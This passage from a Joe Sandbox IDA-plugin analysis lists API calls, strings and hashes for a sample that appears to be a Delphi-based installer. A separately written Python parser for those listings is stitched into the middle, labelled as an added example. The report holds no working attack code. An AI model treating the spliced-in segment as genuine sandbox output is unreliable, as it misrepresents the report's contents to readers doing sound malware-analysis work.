                                                                                      • Instruction Fuzzy Hash: E4018470200744AED701AB62AC03B6B3A98D754B5AF91447BFC04A61A3D7BC5D089E2D

                                                                                      Control-flow Graph (graph image not reproduced; entry block 46e048)
                                                                                      APIs
                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,0046E219,?,00000000,?,00000001,00000000,0046E3E7,?,00000000,?,00000000,?,0046E5A2), ref: 0046E1F5
                                                                                      • FindClose.KERNEL32(000000FF,0046E220,0046E219,?,00000000,?,00000001,00000000,0046E3E7,?,00000000,?,00000000,?,0046E5A2,?), ref: 0046E213
                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,0046E33B,?,00000000,?,00000001,00000000,0046E3E7,?,00000000,?,00000000,?,0046E5A2), ref: 0046E317
                                                                                      • FindClose.KERNEL32(000000FF,0046E342,0046E33B,?,00000000,?,00000001,00000000,0046E3E7,?,00000000,?,00000000,?,0046E5A2,?), ref: 0046E335
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileNext
                                                                                      • String ID: IF$sF$sF
                                                                                      • API String ID: 2066263336-2713198477
                                                                                      • Opcode ID: 6a7a0da7ad197dfdba6f926028919c8a572ec1f5835758eec4f6d61e2094463d
                                                                                      • Instruction ID: 1230aeaf309185c7ec03d96dbdc6ad6414d2784c2265a1c5d62d22ef3a6f047c
                                                                                      • Opcode Fuzzy Hash: 6a7a0da7ad197dfdba6f926028919c8a572ec1f5835758eec4f6d61e2094463d
                                                                                      • Instruction Fuzzy Hash: 51B13D3490425D9FCF11DFA6C881ADEBBF9BF49304F5081AAE808A7391D7389A46CF55
                                                                                      APIs
                                                                                      • RegisterClipboardFormatA.USER32(commdlg_help), ref: 0043031C
                                                                                      • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0043032B
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00430345
                                                                                      • GlobalAddAtomA.KERNEL32(00000000), ref: 00430366
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                      • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                      • API String ID: 4130936913-2943970505
                                                                                      • Opcode ID: d957c5322606f91c3a63daffd078634db936568746c689a8806e8aa63a5fc16b
                                                                                      • Instruction ID: 0713c644b5c0c2c8d9555e19a872e1a2a1cf9f6f22ed51b2a28eccd68185566a
                                                                                      • Opcode Fuzzy Hash: d957c5322606f91c3a63daffd078634db936568746c689a8806e8aa63a5fc16b
                                                                                      • Instruction Fuzzy Hash: 9CF082704483808BD700EB75C842B197AE0EB98708F01467FB898A62E1D77A8500CB5F
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00453C20,00453C20,00000031,00453C20,00000000), ref: 00453BAC
                                                                                      • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00453C20,00453C20,00000031,00453C20), ref: 00453BB9
                                                                                        • Part of subcall function 00453970: WaitForInputIdle.USER32(00000001,00000032), ref: 0045399C
                                                                                        • Part of subcall function 00453970: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 004539BE
                                                                                        • Part of subcall function 00453970: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 004539CD
                                                                                        • Part of subcall function 00453970: CloseHandle.KERNEL32(00000001,004539FA,004539F3,?,00000031,00000080,00000000,?,?,00453D4B,00000080,0000003C,00000000,00453D61), ref: 004539ED
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                      • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                      • API String ID: 854858120-615399546
                                                                                      • Opcode ID: 969602a1eac1dd91b4af2a32f62313c77e3a40ceb3341a8b7a3818eab434afd5
                                                                                      • Instruction ID: 0d4c244814a61e6a9f40f8d6579175ec88b371b5f0bc4768c512e06936e56e52
                                                                                      • Opcode Fuzzy Hash: 969602a1eac1dd91b4af2a32f62313c77e3a40ceb3341a8b7a3818eab434afd5
                                                                                      • Instruction Fuzzy Hash: 0D51767460035DABCB01EFA5C842B9EBBB9AF44346F50443BB844B7283D7789F098B58
                                                                                      APIs
                                                                                      • LoadIconA.USER32(00400000,MAINICON), ref: 0042368C
                                                                                      • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 004236B9
                                                                                      • OemToCharA.USER32(?,?), ref: 004236CC
                                                                                      • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 0042370C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$FileIconLoadLowerModuleName
                                                                                      • String ID: 2$MAINICON
                                                                                      • API String ID: 3935243913-3181700818
                                                                                      • Opcode ID: b8e4f3de8f6e7962c855b1bbff0a6ea575b20ad32e9f870a500b7efad52da8d9
                                                                                      • Instruction ID: d7f5d394b2ec06d520cb0a4b60bf3498b9d8aa77ab50e693133e7ce4a757069a
                                                                                      • Opcode Fuzzy Hash: b8e4f3de8f6e7962c855b1bbff0a6ea575b20ad32e9f870a500b7efad52da8d9
                                                                                      • Instruction Fuzzy Hash: DC31A2B0A042559ADF10EF29D8C57C67BE8AF14308F4441BAE844DB393D7BED988CB65
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(00000000), ref: 00418EAD
                                                                                      • GlobalAddAtomA.KERNEL32(00000000), ref: 00418ECE
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00418EE9
                                                                                      • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F0A
                                                                                        • Part of subcall function 00423038: 73A0A570.USER32(00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 0042308E
                                                                                        • Part of subcall function 00423038: EnumFontsA.GDI32(00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 004230A1
                                                                                        • Part of subcall function 00423038: 73A14620.GDI32(00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230A9
                                                                                        • Part of subcall function 00423038: 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230B4
                                                                                        • Part of subcall function 004235FC: LoadIconA.USER32(00400000,MAINICON), ref: 0042368C
                                                                                        • Part of subcall function 004235FC: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 004236B9
                                                                                        • Part of subcall function 004235FC: OemToCharA.USER32(?,?), ref: 004236CC
                                                                                        • Part of subcall function 004235FC: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 0042370C
                                                                                        • Part of subcall function 0041F088: GetVersion.KERNEL32(?,00418F60,00000000,?,?,?,00000001), ref: 0041F096
                                                                                        • Part of subcall function 0041F088: SetErrorMode.KERNEL32(00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0B2
                                                                                        • Part of subcall function 0041F088: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0BE
                                                                                        • Part of subcall function 0041F088: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0CC
                                                                                        • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F0FC
                                                                                        • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F125
                                                                                        • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F13A
                                                                                        • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F14F
                                                                                        • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F164
                                                                                        • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F179
                                                                                        • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F18E
                                                                                        • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F1A3
                                                                                        • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F1B8
                                                                                        • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F1CD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A14620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                                      • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                      • API String ID: 3476490787-2767913252
                                                                                      • Opcode ID: 1c5da02b922e4aac06326fd948070b9cb60db65944391413fb0283cc291dbe50
                                                                                      • Instruction ID: b4a2cca2d4326696562d23f03e9beb5cdbbc64ba536a620a3ee3ba5bc66bdef7
                                                                                      • Opcode Fuzzy Hash: 1c5da02b922e4aac06326fd948070b9cb60db65944391413fb0283cc291dbe50
                                                                                      • Instruction Fuzzy Hash: 9A1160B06142409AC700FF2A984274A7AE0EB64309F41843FF448DB2A1DB3D9945CB5E
                                                                                      APIs
                                                                                      • SetWindowLongA.USER32(?,000000FC,?), ref: 004135D4
                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 004135DF
                                                                                      • GetWindowLongA.USER32(?,000000F4), ref: 004135F1
                                                                                      • SetWindowLongA.USER32(?,000000F4,?), ref: 00413604
                                                                                      • SetPropA.USER32(?,00000000,00000000), ref: 0041361B
                                                                                      • SetPropA.USER32(?,00000000,00000000), ref: 00413632
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow$Prop
                                                                                      • String ID:
                                                                                      • API String ID: 3887896539-0
                                                                                      • Opcode ID: 86a15e674b3ea48860a72e4751bd866d9c55aec508b8b4782c27e449c12c4e66
                                                                                      • Instruction ID: 44bb5ba5a57c54889193f85f1a8a28b74f903b4ef320443ee5f093ebf11223bc
                                                                                      • Opcode Fuzzy Hash: 86a15e674b3ea48860a72e4751bd866d9c55aec508b8b4782c27e449c12c4e66
                                                                                      • Instruction Fuzzy Hash: B611C975500244BFDB00DF99DC85E9A3BE8BB19364F114266B928DB2A1D738D9908B68
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045425B,?,00000000,0045429B), ref: 004541A1
                                                                                      Strings
                                                                                      • PendingFileRenameOperations2, xrefs: 00454170
                                                                                      • PendingFileRenameOperations, xrefs: 00454140
                                                                                      • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454124
                                                                                      • WININIT.INI, xrefs: 004541D0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpen
                                                                                      • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                      • API String ID: 47109696-2199428270
                                                                                      • Opcode ID: 3b606e1cfbb150bd088f74f1063c905db1383d3fd6ed35e0c09aba21d543f6f9
                                                                                      • Instruction ID: 8ceaccac1fe58e6261fec66e20af0929b63452d54162f6f6a325dab65676f0d5
                                                                                      • Opcode Fuzzy Hash: 3b606e1cfbb150bd088f74f1063c905db1383d3fd6ed35e0c09aba21d543f6f9
                                                                                      • Instruction Fuzzy Hash: 0051BA30E001189FDB10DF62DC519DEB7B9EFC4348F5085B7F814AB292DB78AA85CA58
                                                                                      APIs
                                                                                      • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00463A85
                                                                                      • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00463AAB
                                                                                        • Part of subcall function 00463928: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 004639C0
                                                                                        • Part of subcall function 00463928: DestroyCursor.USER32(00000000), ref: 004639D6
                                                                                      • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00463B07
                                                                                      • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00463B2D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Icon$ExtractFileInfo$CursorDestroyDraw
                                                                                      • String ID: c:\directory
                                                                                      • API String ID: 2926980410-3984940477
                                                                                      • Opcode ID: 1a7901e35b7efb8855ed844898b1e62419ded63c9a28a762335ba207438abc47
                                                                                      • Instruction ID: 671f662d79a6b5497fd1efd513546b718c4d5ac7f56db0c83477fb4c85f01fd4
                                                                                      • Opcode Fuzzy Hash: 1a7901e35b7efb8855ed844898b1e62419ded63c9a28a762335ba207438abc47
                                                                                      • Instruction Fuzzy Hash: 5C417F70640288AFD711DF55DC8AFDEBBE8EB48705F1040A6F904DB382D679EE808B59
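Every function block on this page lists its API calls in one line grammar: a bullet, an optional "Part of subcall function XXXXXXXX:" prefix, API.MODULE(args) and ", ref: XXXXXXXX" for the call-site address. The parser below turns those lines into records so the blocks can be searched as data (registry paths opened, literal strings per API, calls the sandbox could not name). It is an added example and not Joe Sandbox code or tooling; the grammar is inferred from the lines on this page, the sample lines are copied from the blocks above (marked as constructed in the code), and the hive names are my mapping of the standard HKEY_* constants. One caveat the example preserves rather than hides: the argument columns are the sandbox's rendering of raw stack slots, so a string in a slot can belong to the caller's frame (the "advapi32.dll" shown as the second GetProcAddress argument above looks like such a leftover), which is why the helpers report strings as leads rather than as the API's true parameters.

```python
"""Parse Joe Sandbox per-function "APIs" listing lines into structured records.

Added example, not Joe Sandbox code. Grammar inferred from this report's lines:
  [Part of subcall function XXXXXXXX: ]API.MODULE[(args)], ref: XXXXXXXX
Argument slots are kept verbatim as strings: the sandbox prints raw stack slots.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: listing lines copied from function blocks on this page,
# plus two section-header lines that the parser must skip.
SAMPLE = r"""
APIs
• GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00453C20,00453C20,00000031,00453C20,00000000), ref: 00453BAC
• GetCurrentThreadId.KERNEL32 ref: 00430345
  • Part of subcall function 00453970: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 004539CD
• GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DE0B,00000000,0042DE23,?,?,?,?,00000006,?,00000000,00491FBA), ref: 0042DCA3
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DCA9
  • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
  • Part of subcall function 0041F088: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0BE
  • Part of subcall function 00423038: 73A0A570.USER32(00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 0042308E
Memory Dump Source
"""

LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?"            # args absent for e.g. GetCurrentThreadId
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")   # a rendered 32-bit stack slot

# Assumed mapping of the documented HKEY_* root-key constants to short names.
HIVES = {"80000000": "HKCR", "80000001": "HKCU", "80000002": "HKLM", "80000003": "HKU"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int                      # call-site address from ", ref: "
    caller: Optional[int] = None  # function listed in "Part of subcall function"

    def string_args(self):
        """Slots the sandbox rendered as literal text rather than a hex word or '?'."""
        return [a for a in self.args if a != "?" and not HEX_RE.match(a)]


def parse_listing(text):
    """One ApiCall per parseable bullet line; headers and other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(
            api=m.group("api"), module=m.group("module").upper(), args=args,
            ref=int(m.group("ref"), 16),
            caller=int(m.group("caller"), 16) if m.group("caller") else None,
        ))
    return calls


def strings_by_api(calls):
    """Literal strings seen near each API call, in listing order (leads, not proof:
    a slot may hold a value left by the caller's frame rather than this call's argument)."""
    out = {}
    for c in calls:
        for s in c.string_args():
            out.setdefault(c.api, []).append(s)
    return out


def registry_paths(calls):
    """'HIVE\\subkey' for Reg* calls whose first two slots look like (hKey, lpSubKey)."""
    paths = []
    for c in calls:
        if c.module == "ADVAPI32" and c.api.startswith("Reg") and len(c.args) >= 2:
            hive = HIVES.get(c.args[0].upper())
            if hive and c.args[1] != "?" and not HEX_RE.match(c.args[1]):
                paths.append(f"{hive}\\{c.args[1]}")
    return paths


def unresolved_apis(calls):
    """Calls whose 'name' is a bare address: the sandbox could not map the target to an export."""
    return [c for c in calls if HEX_RE.match(c.api)]


def summarize(calls):
    """Call counts per module, e.g. to spot a registry- or network-heavy function quickly."""
    counts = {}
    for c in calls:
        counts[c.module] = counts.get(c.module, 0) + 1
    return counts


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE)
    print(summarize(parsed))
    print(registry_paths(parsed))
    print([c.api for c in unresolved_apis(parsed)])
    for api, strs in strings_by_api(parsed).items():
        print(api, strs)
```

To run it over a real report, paste the lines of one or more "APIs" sections into SAMPLE (or read them from a file); indentation and the two-space "Part of subcall function" nesting are tolerated by the regex, and lines that do not fit the grammar are simply skipped rather than raising.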
                                                                                      APIs
                                                                                      • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 0042DC88
                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DE0B,00000000,0042DE23,?,?,?,?,00000006,?,00000000,00491FBA), ref: 0042DCA3
                                                                                      • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DCA9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressDeleteHandleModuleProc
                                                                                      • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                      • API String ID: 588496660-1846899949
                                                                                      • Opcode ID: 1ac9f45d9403d68368f5ea09b308c2771ffc131f1d77a79e4eddddbac772e20e
                                                                                      • Instruction ID: 479eeeb2458f1cbf9b477f45b3eef1c6296245770f751ec8fb172f928072974a
                                                                                      • Opcode Fuzzy Hash: 1ac9f45d9403d68368f5ea09b308c2771ffc131f1d77a79e4eddddbac772e20e
                                                                                      • Instruction Fuzzy Hash: 57E06DF0B45230AAD620676B7D4AFA327299B64725F54403BB105A619182FD4C40DE5C
                                                                                      APIs
                                                                                      • SetActiveWindow.USER32(?,?,00000000,0047DCA9,?,?,00000001,?), ref: 0047DAA5
                                                                                      • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 0047DB1A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ActiveChangeNotifyWindow
                                                                                      • String ID: $Need to restart Windows? %s
                                                                                      • API String ID: 1160245247-4200181552
                                                                                      • Opcode ID: 12037f27ca6cd308aea1d326a4c3b70745560e3ec434e9b2862bfd7b37a3da6d
                                                                                      • Instruction ID: 90cd12f1ce5866ea51d49213f29bb353ee2a99eceb2f679e27348fc142a0b483
                                                                                      • Opcode Fuzzy Hash: 12037f27ca6cd308aea1d326a4c3b70745560e3ec434e9b2862bfd7b37a3da6d
                                                                                      • Instruction Fuzzy Hash: FD91B170A142448FCB11EB69D882B9E77F1AF55308F5080BBE8049B366DB78AD09DB5D
                                                                                      APIs
                                                                                        • Part of subcall function 0042C6E0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C704
                                                                                      • GetLastError.KERNEL32(00000000,0046BAB1,?,?,00000001,00497154), ref: 0046B98E
                                                                                      • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046BA08
                                                                                      • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046BA2D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                      • String ID: Creating directory: %s
                                                                                      • API String ID: 2451617938-483064649
                                                                                      • Opcode ID: 6e6b56944f7af39c61aec4d517d3385b6d008573cf9049f4c4aabfc7d62e10ff
                                                                                      • Instruction ID: 7ea54ca36873d6337a8b148a308a739efa0342075aaa82460d6101fa077cad05
                                                                                      • Opcode Fuzzy Hash: 6e6b56944f7af39c61aec4d517d3385b6d008573cf9049f4c4aabfc7d62e10ff
                                                                                      • Instruction Fuzzy Hash: 40512F74E00258ABDB01DFE5C482BDEB7F5EF48304F50856AE851A7382D7785E44CB99
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00453876
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,0045393C), ref: 004538E0
                                                                                      Strings
                                                                                      Memory Dump Source
